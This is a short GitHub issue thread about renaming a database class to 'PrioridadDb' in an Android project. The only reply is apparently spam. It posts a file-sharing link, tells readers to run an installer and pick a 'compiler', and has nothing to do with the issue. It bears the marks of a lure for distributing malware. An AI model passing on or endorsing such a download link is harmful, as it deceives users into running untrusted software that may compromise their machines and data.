### ISSUE TITLE
Debe llamarse "PrioridadDb"

### ISSUE THREAD

**Issue by JPichardo2003** [KingOfXone/RegistroDePrioridades#2]
https://github.com/KingOfXone/RegistroDePrioridades/blob/ba532732295d3f2c6f77deeea2b19a2bb83dbf4a/app/src/main/java/edu/ucne/prioridades/data/database/PrioridadDB.kt#L16

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
